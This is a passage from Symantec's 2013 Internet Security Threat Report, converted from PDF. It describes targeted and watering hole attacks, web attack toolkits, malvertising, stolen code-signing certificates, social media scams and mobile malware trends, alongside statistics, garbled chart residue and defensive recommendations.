attacks in other areas, such as back-office roles, are still a<br />
significant threat.<br />
Attackers continue to use social engineering techniques<br />
in targeted attacks. For example, messages impersonating<br />
EU officials, messages that appear to come from <strong>security</strong><br />
agencies in the United States and target other government<br />
officials, or messages that piggyback announcements<br />
about new procurement plans from potential government<br />
clients such as the U.S. Air Force. This shows extensive<br />
research, a sophisticated understanding of the motivation<br />
of recipients, and makes it much more likely that victims<br />
will open attachments that contain malware.<br />
Watering Hole Attacks<br />
The biggest innovation in targeted attacks was the<br />
emergence of watering hole attacks. This involves<br />
compromising a legitimate website that a targeted victim<br />
might visit and using it to install malware on their<br />
computer. For example, this year we saw a line of code in a<br />
tracking script 11 on a human rights organization’s website<br />
with the potential to compromise a computer. It exploited<br />
a new, zero-day vulnerability in Internet Explorer® to<br />
infect visitors. Our data showed that within 24 hours,<br />
people in 500 different large companies and government<br />
organizations visited the site and ran the risk of infection.<br />
The attackers in this case, known as the Elderwood<br />
Gang, used sophisticated tools and exploited zero-day<br />
vulnerabilities in their attacks, pointing to a wellresourced<br />
team backed by a large criminal organization<br />
or a nation state. 12
p. 22<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
TaRgETEd aTTaCkS, haCkTIVISM, aNd daTa bREaChES<br />
Recommendations<br />
Assume You’re a Target.<br />
Small size and relative anonymity are not defenses against the<br />
most sophisticated attacks. Targeted attacks threaten small<br />
companies as well as large ones. Attackers could also use your<br />
website as a way to attack other people. If you assume you<br />
are a potential target and improve your defenses against the<br />
most serious threats, you will automatically improve your<br />
protection against other threats.<br />
Defense in Depth.<br />
Emphasize multiple, overlapping, and mutually supportive<br />
defensive systems to guard against single-point failures in<br />
any specific technology or protection method. This should<br />
include the deployment of regularly updated firewalls, as well<br />
as gateway antivirus, intrusion detection, intrusion protection<br />
systems, and Web <strong>security</strong> gateway solutions throughout the<br />
network. Endpoints must be secured by more than signaturebased<br />
antivirus technology.<br />
Educate Employees.<br />
Raise employees’ awareness about the risks of social<br />
engineering and counter it with staff training. Similarly, good<br />
training and procedures can reduce the risk of accidental data<br />
loss and other insider risks. Train staff about the value of<br />
data and how to protect it.<br />
Data Loss Prevention.<br />
Prevent data loss and exfiltration with data loss protection<br />
software on your network. Use encryption to protect data in<br />
transit, whether online or via removable storage.
p. 23<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERabILITIES<br />
ExPLOITS<br />
aNd TOOLkITS
p. 24<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERabILITIES, ExPLOITS, aNd TOOLkITS<br />
Introduction<br />
Recent research by the Ponemon Institute suggests that the<br />
cost of cybercrime rose by six percent in 2012 with a 42 percent<br />
increase in the number of cyberattacks. The cost is significant<br />
with businesses incurring an average cost of $591,780. 13 Given<br />
the increase availability of vulnerabilities and exploits it comes<br />
as no surprise that the cybercriminals have increased their<br />
ability to make a profit.<br />
Quite a few diverse skills are needed to find vulnerabilities,<br />
create ways to exploit them, and then run attacks using them.<br />
Fortunately for the cybercriminal, a black market exists where<br />
these skills can be purchased in the form of toolkits. Hackers<br />
find and exploit and or sell vulnerabilities. Toolkit authors find<br />
or buy exploit code and incorporate it into their “products.”<br />
Cybercriminals in turn buy or steal the latest versions of toolkits<br />
which allow them to run massive attacks without the trouble of<br />
learning the skills needed to run the whole operation.<br />
data<br />
browser Vulnerabilities 2010 – 2012<br />
Source: Symantec<br />
50%<br />
45<br />
40<br />
35<br />
30<br />
25<br />
20<br />
15<br />
10<br />
5<br />
2010<br />
Apple Safari<br />
Google Chrome<br />
Mozilla Firefox<br />
Microsoft Internet Explorer<br />
Opera<br />
2011<br />
2012<br />
at a glance<br />
• Usage of zero-day vulnerabilities is up, from 8 to 14 in 2012.<br />
• There is an increasingly sophisticated black market serving a<br />
multi-billion dollar online crime industry.<br />
• These vulnerabilities are later commercialized and added<br />
to Web-attack toolkits, usually after they become published<br />
publicly.<br />
• In 2012, drive-by Web attacks increased by one third, possibly<br />
driven by malvertising.<br />
• Around 600,000 Macs were infected with Flashback malware<br />
this year.<br />
• The Sakura toolkit, which had little impact in 2011, now<br />
accounts for approximately 22 percent of Web-based toolkit<br />
attacks, overtaking Blackhole during some points of the year.<br />
Plug-in Vulnerabilities 2010 – 2012<br />
Source: Symantec<br />
50%<br />
45<br />
40<br />
35<br />
30<br />
25<br />
20<br />
15<br />
10<br />
5<br />
2010<br />
Adobe Flash Player<br />
Oracle Sun Java<br />
Adobe Acrobat Reader<br />
Apple QuickTime<br />
2011<br />
2012
p. 25<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERabILITIES, ExPLOITS, aNd TOOLkITS<br />
Total Vulnerabilities<br />
Source: Symantec<br />
600<br />
500<br />
400<br />
300<br />
200<br />
100<br />
0<br />
Zero-day Vulnerabilities<br />
Source: Symantec<br />
3<br />
2<br />
1<br />
JAN<br />
JAN<br />
FEB<br />
FEB<br />
MAR<br />
MAR<br />
APR<br />
APR<br />
MAY<br />
MAY<br />
JUN<br />
JUN<br />
JUL<br />
JUL<br />
AUG<br />
AUG<br />
SEP<br />
SEP<br />
OCT<br />
OCT<br />
NOV<br />
NOV<br />
DEC<br />
DEC<br />
• There were 5,291<br />
vulnerabilities reported in<br />
2012, compared with 4,989<br />
in 2011.<br />
• Reported vulnerabilities per<br />
month in 2012 fluctuated<br />
roughly between 300 and<br />
500 per month.<br />
• In 2012, there were 85<br />
public SCADA (Supervisory<br />
Control and Data Acquisition)<br />
vulnerabilities, a massive<br />
decrease over the 129<br />
vulnerabilities in 2011.<br />
• There were 415 mobile<br />
vulnerabilities identified in<br />
2012, compared with 315 in<br />
2011.<br />
• A zero-day vulnerability is<br />
one that is reported to have<br />
been exploited in the wild<br />
before the vulnerability is<br />
public knowledge and prior<br />
to a patch being publicly<br />
available.<br />
• There were 14 zero-day<br />
vulnerabilities reported in<br />
2012.<br />
• There were up to 3 zero-day<br />
vulnerabilities reported each<br />
month.
p. 26<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERabILITIES, ExPLOITS, aNd TOOLkITS<br />
analysis<br />
Web-based Attacks on the Rise<br />
We have seen the number of Web-based attacks increase by<br />
almost a third. These attacks silently infect enterprise and<br />
consumer users when they visit a compromised website. In<br />
other words, you can be infected simply by visiting a legitimate<br />
website. Typically, attackers infiltrate the website to install their<br />
attack toolkits and malware payloads, unbeknown to the site<br />
owner or the potential victims.<br />
The malware payload that is dropped by Web-attack toolkits<br />
is often server-side polymorphic or dynamically generated,<br />
rendering enterprises that rely on signature-based antivirus<br />
protection unable to protect themselves against these silent<br />
attacks. A hidden piece of JavaScript or a few lines of code<br />
linking to another website can install malware that is very<br />
difficult to detect. It then checks the system of each visitor for<br />
browser or operating system vulnerabilities until it finds one<br />
that is likely to succeed and it uses that to install malware on<br />
the visitor’s computer.<br />
These attacks are successful because enterprise and consumer<br />
systems are not up to date with the latest patches for browser<br />
plug-ins, such as Adobe’s Flash Player® and Acrobat Reader®,<br />
as well as Oracle’s Java platform. While a lack of attentiveness<br />
can be blamed for consumers remaining out of date, often in<br />
larger companies, older versions of these plug-ins are required<br />
to run critical business systems, making it harder to upgrade<br />
to the latest versions. Such patch management predicaments,<br />
with slow patch deployment rates, make companies especially<br />
vulnerable to Web-based attacks.<br />
It’s important to note that the volume of vulnerabilities doesn’t<br />
correlate to increased levels of risk. One single vulnerability in<br />
an application may present a critical risk to an organization,<br />
if exploited successfully. Analysis of risk from vulnerabilities<br />
exploited in Web-based attack toolkits is an area that Symantec<br />
will explore further in <strong>2013</strong>.<br />
The key is that it’s not the latest zero-day vulnerability that is<br />
responsible for the widespread success of Web-based attacks.<br />
The rate of attacks from compromised websites has increased<br />
by 30 percent, while the rate of discovery of vulnerabilities has<br />
only increased by 6 percent. In a nutshell, it’s older, non-patched<br />
vulnerabilities that cause most systems to get compromised.<br />
The Arms Race to Exploit New Vulnerabilities<br />
We have witnessed an increase in zero-day vulnerabilities this<br />
year. There were 14 unreported vulnerabilities first seen being<br />
used in the wild in 2012. This is up from 8 in 2011. Overall,<br />
reported vulnerabilities are up slightly in 2012, from 4,989 in<br />
2011 to 5,291 in 2012. Mobile vulnerabilities are also up, from<br />
315 in 2011 to 415 reported in 2012.<br />
Organized groups, such as the team behind the Elderwood<br />
attacks, have worked to discover new weaknesses in everyday<br />
software such as Web browsers and browser plug-ins. When one<br />
vulnerability becomes public, they are able to quickly deploy<br />
a new one, which speaks to the sophistication of the groups<br />
creating vulnerabilities.<br />
There is an arms race between Internet criminals and legitimate<br />
software developers. Criminals’ ability to quickly find and<br />
exploit new vulnerabilities is not matched by software vendors’<br />
ability to fix and release patches. Some software companies<br />
only patch once a quarter; others are slow to acknowledge<br />
vulnerabilities. Even if they do a good job with updates,<br />
companies are often slow to deploy them.<br />
While zero-day vulnerabilities present a serious <strong>security</strong> threat,<br />
known (and even patched) vulnerabilities are dangerous if ignored.<br />
Many companies and consumers fail to apply published updates<br />
in a timely way. Toolkits that target well-known vulnerabilities<br />
make it easy for criminals to target millions of PCs and find the<br />
ones that remain open to infection. In fact, the vulnerabilities that<br />
are exploited the most often are not the newest.
p. 27<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERabILITIES, ExPLOITS, aNd TOOLkITS<br />
Malvertising and Website Hacking<br />
How does a hacker add his code to a legitimate website? Toolkits<br />
are available that make it easy. For example, in May 2012, the<br />
LizaMoon toolkit used a SQL injection technique to affect at<br />
least a million websites. 14 Other approaches include:<br />
• Exploiting a known vulnerability in the website hosting or<br />
content management software<br />
• Using phishing, spyware, or social engineering to get the<br />
webmaster’s password<br />
• Hacking through the Web server backend infrastructure,<br />
such as control panels or databases<br />
• Paying to host an advertisement that contains the infection<br />
This last technique, known as malvertising, means that legitimate<br />
websites can be impacted without even being compromised. This<br />
form of attack appears to be very common. Using experimental<br />
scanning software (see “Website Malware Scanning and Website<br />
Vulnerability Assessment” later in this section), Symantec found<br />
that half of the tested sites were infected by malvertising.<br />
Malvertising opens an avenue of attack that hackers can use<br />
to compromise a website without having to directly hack<br />
the website itself. Using these malicious ads allows them to<br />
silently infect users, often installing dynamically created<br />
malware that antivirus alone is unable to detect.<br />
A sign of the seriousness of the problem is that Google<br />
and other search engines scan for malware and blacklist<br />
sites that contain malware. There have been occasions<br />
when prominent advertising networks have fallen prey to<br />
malvertising, impacting some of the biggest names in online<br />
media. 15 Situations like this can have a serious impact on<br />
websites whose bottom line often depends on revenue, even<br />
diminishing their credibility in the eyes of their readers.<br />
With dozens of advertising networks and constantly rotating<br />
adverts, tracking malvertising and preventing it is a huge<br />
challenge.<br />
Online advertisement for a malware toolkit.
p. 28<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERabILITIES, ExPLOITS, aNd TOOLkITS<br />
Web Attack Toolkits<br />
It’s one thing to discover new vulnerabilities, but another<br />
matter to implement a way to exploit them. Criminal<br />
entrepreneurs turn them into toolkits that less sophisticated<br />
users can buy and use. Like commercial software, they even<br />
include support and warranties. Authors accept payments<br />
using online payment services with anonymous numbered<br />
accounts.<br />
Attack toolkits exist for creating a variety of malware and<br />
for attacking websites. The popular Blackhole toolkit is a<br />
notorious example. This updating strategy suggests that it has<br />
a kind of brand loyalty and that the authors are building on<br />
that in the same way that legitimate software vendors do with<br />
their updates and new editions.<br />
Blackhole continued to make its presence felt in 2012,<br />
making up for 41 percent of all Web-based attacks. We also<br />
saw the release of an updated version of the toolkit, dubbed<br />
Blackhole 2.0, back in September. However, Blackhole’s overall<br />
dominance may have begun to decline, as another Web attack<br />
toolkit surpassed Blackhole during a few months in the latter<br />
half of 2012. Sakura, a new entrant to the market, at its peak<br />
made up as much of 60 percent of all toolkit activity, and 22<br />
percent of overall toolkit usage in 2012.<br />
Web attack Toolkits Over Time<br />
Source: Symantec<br />
90%<br />
80<br />
70<br />
60<br />
50<br />
40<br />
30<br />
20<br />
10<br />
JAN<br />
FEB<br />
MAR<br />
APR<br />
MAY<br />
JUN<br />
JUL<br />
AUG<br />
Top Web attack Toolkits by Percent<br />
Source: Symantec<br />
Sakura<br />
22%<br />
Blackhole<br />
41%<br />
Others<br />
20%<br />
10% Phoenix<br />
7% Redkit<br />
Approximately 41 percent of Web-based toolkit attacks<br />
in 2012 related to the Blackhole toolkit, compared with<br />
44 percent in 2011. The Sakura toolkit was not in the<br />
top 10 for 2011, and now accounts for approximately<br />
22 percent of Web-based toolkit attacks, overtaking<br />
Blackhole at some points in the year.<br />
SEP<br />
OCT<br />
NOV<br />
DEC<br />
Others<br />
Blackhole<br />
Sakura<br />
Nuclear<br />
Redkit<br />
Phoenix
p. 29<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERabILITIES, ExPLOITS, aNd TOOLkITS<br />
Website Malware Scanning and Website<br />
Vulnerability Assessment<br />
In 2012, Symantec’s Trust Services (formerly VeriSign)<br />
technology scanned over 1.5 million websites as part of its<br />
Website Malware Scanning and Vulnerability Assessment<br />
services. Over 130,000 URLs were scanned for malware each<br />
day, with 1 in 532 of websites found to be infected with<br />
malware. The most common form of compromise was for<br />
the use of drive-by downloads.<br />
Furthermore, in assessing potentially exploitable vulnerabilities<br />
on websites, over 1,400 vulnerability scans were performed each<br />
day. Approximately 53 percent of websites scanned were found<br />
to have unpatched, potentially exploitable vulnerabilities (36<br />
percent in 2011), of which 24 percent were deemed to be critical<br />
(25 percent in 2011). The most common vulnerability found was<br />
for cross-site scripting vulnerabilities.<br />
The Growth of Secured Connections<br />
One of the ways to judge the growth of usage for SSL is to<br />
monitor the change in statistics for OCSP (Online Certificate<br />
Status Protocol, which is used for obtaining the revocation<br />
status of a digital certificate) and CRL (Certificate Revocation<br />
List) lookups. When an SSL secured connection is initiated, a<br />
revocation check is performed using OCSP or CRL and we track<br />
the number of lookups that go through our systems. This is a<br />
growth indicator for the number of SSL secured sessions that<br />
are performed online. This implies that more people are going<br />
online and using secured connections (for example, representing<br />
a growth of eCommerce transactions on the Web). It also may<br />
show the impact of the adoption of SSL more widely, in more<br />
places and for more uses, such as the growing use of Extended<br />
Validation SSL Certificates, which trigger browsers to indicate<br />
whether a user is on a secured site by turning the address bar<br />
green, and for “Always On SSL” (adopted heavily through 2012<br />
by social networks, search services, and online email providers).<br />
Further, it may be a result of devices other than traditional<br />
desktops and laptops that enable online access; for example,<br />
smartphones and tablets.<br />
In 2012, Symantec identified the average number of OCSP<br />
lookups grew by 31 percent year on year between 2011 and<br />
2012, with more than 4.8 billion lookups performed each day in<br />
2012. The high-water-mark of OCSP lookups was 5.8 billion in<br />
a single day in 2012. It is worth noting that OCSP is the modern<br />
revocation checking methodology.<br />
Additionally, Symantec’s CRL lookups increased by 45 percent<br />
year on year between 2011 and 2012, with approximately<br />
1.4 billion per day, and a high-water-mark of 2.1 billion.<br />
CRL is the older lookup technology that OCSP supersedes.<br />
Norton Secured Seal and Trust Marks<br />
In 2012, more consumers were visiting websites with trust<br />
marks (such as the Norton Secured Seal) in 2012. Based on<br />
analysis of the statistics from Symantec’s own trust marks, we<br />
saw an 8 percent increase in 2012. The Symantec trust mark<br />
was viewed up to 750 million times a day in 2012 as more online<br />
users are necessitating stronger <strong>security</strong> to safeguard their<br />
online activities.<br />
Stolen Key-signing Certificates<br />
2012 continued to show that organizations large and small were<br />
susceptible to becoming unwitting players in the global malware<br />
distribution network. We’ve seen increased activity of malware<br />
being signed with legitimate code-signing certificates. Since the<br />
malware code is signed, it appears to be legitimate, which make<br />
it easier to spread.<br />
Malware developers often use stolen code-signing private<br />
keys. They attack Certificate Authorities and once inside<br />
their networks, they seek out and steal private keys. In other<br />
cases, poor <strong>security</strong> practices allow them to buy legitimate<br />
certificates with fake identities. For example, in May 2012,<br />
Comodo, a large Certificate Authority, authenticated and<br />
issued a legitimate code-signing certificate to a fictitious<br />
organization run by cybercriminals. 16
p. 30<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
VULNERabILITIES, ExPLOITS, aNd TOOLkITS<br />
Recommendations<br />
Use a Full Range of Protection Technology.<br />
If the threat landscape was less advanced, then file scanning<br />
technology (commonly called antivirus) would be sufficient<br />
to prevent malware infections. However, with toolkits for<br />
building malware-on-demand, polymorphic malware and<br />
zero-day exploits, antivirus is not enough. Network-based<br />
protection and reputation technology must be deployed on<br />
endpoints to help prevent attacks. And behavior blocking and<br />
scheduled file scanning must be used to help find malware<br />
that avoid preventative defense.<br />
Protect Your Public-facing Websites.<br />
Consider Always On SSL to encrypt visitors’ interactions<br />
with your site across the whole site, not just on the checkout<br />
or sign-up pages. Make sure you update your content<br />
management system and Web server software just as you<br />
would a client PC. Run vulnerability and malware scanning<br />
tools on your websites to detect problems promptly. To protect<br />
these credentials against social engineering and phishing, use<br />
strong passwords for admin accounts and other services. Limit<br />
login access to important Web servers to users that need it.<br />
Protect Code-signing Certificates.<br />
Certificate owners should apply rigorous protection and<br />
<strong>security</strong> policies to safeguard keys. This means effective<br />
physical <strong>security</strong>, the use of cryptographic hardware <strong>security</strong><br />
modules, and effective network and endpoint <strong>security</strong>,<br />
including data loss prevention on servers involved in signing<br />
code, and thorough <strong>security</strong> for applications used to sign code.<br />
In addition, Certificate Authorities need to ensure that they<br />
are using best practices in every step of the authentication<br />
process.<br />
Adopting an Always On SSL approach helps to safeguard<br />
account information from unencrypted connections and thus<br />
render end users less vulnerable to a man-in-the-middle attack.<br />
Be Aggressive on Your Software Updating and Review<br />
Your Patching Processes.<br />
The majority of Web-based attacks exploit the top 20 most<br />
common vulnerabilities. Consequently, installing patches for<br />
known vulnerabilities will prevent the most common attacks.<br />
It’s essential to update and patch all your software promptly.<br />
In particular, with risks like the Flashback attacks that used<br />
Java, it’s important to run the latest version of that software<br />
or do without it altogether. This is equally true for CIOs<br />
managing thousands of users, small business owners with<br />
dozens of users, or individual users at home.<br />
Update, patch, and migrate from outdated and insecure<br />
browsers, applications, and browser plug-ins to the latest<br />
available versions using the vendors’ automatic update<br />
mechanisms, especially for the top software vulnerabilities<br />
being exploited. Most software vendors work diligently<br />
to patch exploited software vulnerabilities; however, such<br />
patches can only be effective if adopted in the field. Be wary of<br />
deploying standard corporate images containing older versions<br />
of browsers, applications, and browser plug-ins that are<br />
outdated and insecure. Consider removing vulnerable plug-ins<br />
from images for employees that have no need for that software.<br />
Wherever possible, automate patch deployments to maintain<br />
protection against vulnerabilities across the organization.
p. 31<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SOCIaL NETWORkINg<br />
MObILE<br />
aNd ThE CLOUd
p. 32<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SOCIaL NETWORkINg, MObILE, aNd ThE CLOUd<br />
Introduction<br />
Online criminals and spammers are less interested in email as<br />
an infection vector than they were. Why? Because social media<br />
is becoming so popular and it gives them many new ways to<br />
steal people’s identities or personal information and infect their<br />
computers with malware.<br />
Social media combines two behaviors that are useful for<br />
criminals: social proof and sharing. Social proofing is the<br />
psychological mechanism that convinces people to do things<br />
because their friends are doing it. For example, if you get a<br />
message on your Facebook wall from a trusted friend, you’re<br />
more likely to click on it.<br />
Sharing is what people do with social networks: they share<br />
personal information such as their birthday, home address, and<br />
other contact details. This type of information is very useful for<br />
identity thieves. For example, your social media profile might<br />
contain clues to <strong>security</strong> questions a hacker would need to reset<br />
your password and take control of your account.<br />
People are spending more time online, and the most popular<br />
activity is for social networking. Furthermore, younger users are<br />
more commonly using mobile devices to access the Internet and<br />
social media applications. 17<br />
data<br />
Top 5 Social Media attacks in 2012<br />
Source: Symantec<br />
1<br />
22<br />
3<br />
44<br />
5<br />
56 %<br />
18 %<br />
10 %<br />
5 %<br />
3 %<br />
Manual<br />
Sharing<br />
Likejacking<br />
Fake Plug-in<br />
Copy and Paste<br />
Fake<br />
Offering<br />
Moreover, many mobile applications frequently rely on cloudbased<br />
storage, and without an Internet connection are often<br />
limited in their functionality. Many more people and businesses<br />
are routinely using cloud-based systems, sometimes without<br />
even realising it.<br />
The bank robber Willie Sutton famously explained why he robbed<br />
banks: “Because that’s where the money is.” Online criminals<br />
target social media because that’s where the victims are.<br />
Facebook users can report potential Facebook phishing<br />
scams to the company through the following email address:<br />
phish@fb.com.<br />
at a glance<br />
• Scammers continue to use social media as spam and phishing<br />
tools, including newer sites such as Pinterest and Instagram.<br />
• Mobile malware has increased significantly in 2012 with new<br />
threats such as mobile botnets.<br />
• Thirty-two percent of all mobile malware steals information<br />
from the compromised device.<br />
• Fast-growing trends towards cloud computing, bring your<br />
own device, and consumerization create additional risks for<br />
businesses.<br />
• Fake Offering. These scams invite social network users to join a fake<br />
event or group with incentives such as free gift cards. Joining often<br />
requires the user to share credentials with the attacker or send a<br />
text to a premium rate number.<br />
• Manual Sharing Scams. These rely on victims to actually do the<br />
hard work of sharing the scam by presenting them with intriguing<br />
videos, fake offers or messages that they share with their friends.<br />
• Likejacking. Using fake “Like” buttons, attackers trick users into<br />
clicking website buttons that install malware and may post updates<br />
on a user’s newsfeed, spreading the attack.<br />
• Fake Plug-in Scams. Users are tricked into downloading fake<br />
browser extensions on their machines. Rogue browser extensions<br />
can pose like legitimate extensions but when installed can steal<br />
sensitive information from the infected machine.<br />
• Copy and Paste Scams. Users are invited to paste malicious<br />
JavaScript code directly into their browser’s address bar in the<br />
hope of receiving a gift coupon in return.
p. 33<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SOCIaL NETWORkINg, MObILE, aNd ThE CLOUd<br />
Mobile Vulnerabilities<br />
Source: Symantec<br />
120<br />
100<br />
80<br />
60<br />
40<br />
20<br />
JAN<br />
FEB<br />
Mobile Threats in 2012<br />
Source: Symantec<br />
MAR<br />
APR<br />
32 %<br />
121<br />
MOBILE<br />
VULNERABILITIES<br />
IN MARCH<br />
MAY<br />
Steal Information<br />
25 %<br />
Traditional Threats<br />
15 %<br />
Track User<br />
JUN<br />
JUL<br />
AUG<br />
SEP<br />
OCT<br />
NOV<br />
13 %<br />
Send Content<br />
8 %<br />
DEC<br />
Reconfigure Device<br />
8 Adware/Annoyance<br />
%<br />
• March was the most active<br />
month of 2012, with 121<br />
vulnerabilities reported.<br />
• There were 415 mobile<br />
vulnerabilities identified<br />
in 2012, compared with<br />
315 in 2011.<br />
Information stealing tops the list<br />
of activities carried out by mobile<br />
malware, with 32 percent of all<br />
threats recording some sort of<br />
information in 2012.
p. 34<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SOCIaL NETWORkINg, MObILE, aNd ThE CLOUd<br />
Cumulative Mobile android Malware, Families and Variants 2010 to 2012<br />
Source: Symantec<br />
FAMILIES (CUMULATIVE)<br />
200<br />
180<br />
160<br />
140<br />
120<br />
100<br />
80<br />
60<br />
40<br />
20<br />
0<br />
Mobile Threats by device Type in 2012<br />
Source: Symantec<br />
Device Type<br />
JAN, 2010<br />
Android malware 103<br />
symbian malware 3<br />
Windows Mobile malware 1<br />
iOs malware 1<br />
JAN 2011<br />
JAN, 2011<br />
Number of Threats<br />
JAN 2012<br />
JAN, 2012<br />
VARIANTS FAMILIES<br />
• 2012 saw a 58 percent increase in mobile malware families compared to 2011. The year’s total<br />
now accounts for 59 percent of all malware to-date.<br />
• At the same time the number of variants within each family has increased dramatically, from<br />
an average ratio of variants per family of 5:1 in 2011 to 38:1 in 2012. This indicates that threat<br />
authors are spending more time repackaging or making minor changes to their threats, in order<br />
to spread them further and avoid detection.<br />
In contrast to vulnerabilities,<br />
Android was by far the most<br />
commonly targeted mobile<br />
platform in 2012, comprising<br />
103 out of 108 unique threats.<br />
5,000<br />
4,500<br />
4,000<br />
3,500<br />
3,000<br />
2,500<br />
2,000<br />
1,500<br />
1,000<br />
500<br />
0<br />
VARIANTS (CUMULATIVE)
p. 35<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SOCIaL NETWORkINg, MObILE, aNd ThE CLOUd<br />
Mobile Vulnerabilities by OS<br />
Source: Symantec<br />
Platform<br />
Apple iOs 387<br />
Android 13<br />
BlackBerry 13<br />
nokia 0<br />
LG electronics 0<br />
Windows Mobile 2<br />
analysis<br />
Documented Vulnerabilities<br />
Spam and Phishing Move to Social Media<br />
In the last few years, we’ve seen a significant increase in spam<br />
and phishing on social media sites. Criminals follow users to<br />
popular sites. As Facebook and Twitter have grown in popularity<br />
for users, they have also attracted more criminal activity.<br />
However, in the last year, online criminals have also started<br />
targeting newer, fast-growing sites such as Instagram,<br />
Pinterest, and Tumblr.<br />
Typical threats include fake gift cards and survey scams. These<br />
kinds of fake offer scams account for more than half (56 percent)<br />
of all social media attacks. For example, in one scam the victim<br />
sees a post on somebody’s Facebook wall or on their Pinterest<br />
feeds (where content appears from the people they follow or in<br />
specific categories) that says “Click here for a $100 gift card.”<br />
When the user clicks on the link, they go to a website where<br />
they are asked to sign up for any number of offers, turning over<br />
personal details in the process. The spammers get a fee for each<br />
registration and, of course, there’s no gift card at the<br />
end of the process.<br />
The vast majority of vulnerabilities<br />
on mobile systems were on the iOS<br />
platform. However, the higher number<br />
of vulnerabilities is not indicative of a<br />
higher level of threat, because most<br />
mobile threats have not used software<br />
vulnerabilities.<br />
Typical social media scam.<br />
Fake website with bogus survey.
p. 36<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SOCIaL NETWORkINg, MObILE, aNd ThE CLOUd<br />
Phishing site spoofing a social networking site promoting soccer star Lionel Messi.<br />
We also documented a similar spam campaign on<br />
the popular photo-sharing app Instagram. 18<br />
Another trick is to use a fake website to persuade a victim to<br />
reveal their personal details and passwords; for example, their<br />
Facebook or Twitter account information. These phishing<br />
scams are insidious and often exploit people’s fascination with<br />
celebrities such as professional athletes, film stars, or singers.<br />
We have seen an increase in phishing scams that target specific<br />
countries and their celebrities.<br />
In 2012, we have seen ever more threats targeted on social<br />
media websites as well as more and more new channels and<br />
platforms opening up, especially those that are available only as<br />
mobile applications. It is likely that these mobile social channels<br />
will become more targeted in <strong>2013</strong>, especially those that are<br />
aimed specifically at teenagers and young adults, who may not<br />
know how to recognize such attacks and may be a little freer<br />
with their personal details.
p. 37<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SOCIaL NETWORkINg, MObILE, aNd ThE CLOUd<br />
Mobile Threats<br />
In the last year, we have seen a further increase in mobile<br />
malware. This correlates with increasing numbers of Internetconnected<br />
mobile devices. Android has a 72 percent market<br />
share with Apple® iOS a distant second with 14 percent,<br />
according to Gartner. 19 As a result of its market share and more<br />
open development environment, Android is the main target for<br />
mobile threats.<br />
Typically, people use phones to store personal information and<br />
contact information and increasingly they have high-speed<br />
Internet connections. The smartphone has become a powerful<br />
computer in its own right, and this makes these attractive<br />
devices to criminals. They also have the added advantage of<br />
being tied to a payment system—the owner’s phone contract—<br />
which means that they offer additional ways for criminals to<br />
siphon off money from the victim.<br />
We’ve seen a big rise in all kinds of mobile phone attacks:<br />
• Android threats were more commonly found in Eastern<br />
Europe and Asia; however, during the last year, the number<br />
of Android threats in the rest of Europe and the United<br />
States has increased.<br />
• Privacy leaks that disclose personal information, including<br />
the release of surveillance software designed to covertly<br />
transmit the owner’s location. 20<br />
• Premium number fraud where malicious apps send expensive<br />
text messages. This is the quickest way to make money from<br />
mobile malware. One mobile botnet Symantec observed<br />
used fake mobile apps to infect users and by our calculation<br />
the botmaster is generating anywhere between $1,600 to<br />
$9,000 per day and $547,500 to $3,285,000 per year. 21<br />
• Mobile botnets. Just as spammers have linked networks of<br />
PCs into botnets to send out unwanted email, now criminals<br />
have begun using Android botnets the same way. 22 This<br />
suggests that attackers are adapting techniques used on<br />
PCs to work on smartphones.<br />
Historically, malware infected smartphones through rogue app<br />
markets and users sideloading apps directly onto their devices.<br />
However, legitimate app stores are not immune. In 2012, we saw<br />
rogue software masquerading as popular games on the Google®<br />
Play market, having bypassed Google’s automated screening<br />
process. 23<br />
Businesses are increasingly allowing staff to “bring your<br />
own device” (BYOD) to work, either by allowing them to use<br />
personal computers, tablets, or smartphones for work, even<br />
subsidizing their purchase. Even when companies provide their<br />
own equipment, the trend towards consumerization means<br />
that companies often turn to consumer technology, such as<br />
file-sharing websites, and devices, such as consumer laptops<br />
or tablets, to reduce costs. These two trends open the door to<br />
a greater risk to businesses from mobile devices because they<br />
often lack <strong>security</strong> features such as encryption, access control,<br />
and manageability.<br />
We have seen far more vulnerabilities for the iOS platform,<br />
which makes up 93 percent of those published, than for Android<br />
in 2012, but yet Android dominates the malware landscape, with<br />
97 percent of new threats.<br />
While seemingly contradictory at first, there is a good reason<br />
for this: jailbreaking iOS devices. In order to install applications<br />
that are not available on the Apple App Store, a user must run<br />
an exploit against a vulnerability in the software. While not the<br />
safest approach from a <strong>security</strong> standpoint, this is the only way<br />
to install applications that are not available through the Apple<br />
App Store.<br />
In contrast, the Android platform provides the option to<br />
install apps from unofficial markets by simply changing settings<br />
in the operating system. Since no exploit is needed, the same<br />
incentives aren’t present as there are on iOS. Android users are<br />
vulnerable to a whole host of threats; however, very few have<br />
utilized vulnerabilities to spread threats.<br />
While Android clocks in with 103 threats in 2012, this number<br />
may appear small compared to other estimates on the scope of<br />
the mobile threat landscape. Many estimates are larger because<br />
they provide a count of overall variants, as opposed to new,<br />
unique threats. While many of these variants simply undergone<br />
minor changes in an attempt to avoid antivirus scanners<br />
detecting them, Symantec counted at least 3,906 different<br />
mobile variants for the year.<br />
There’s an important distinction between old and new Android<br />
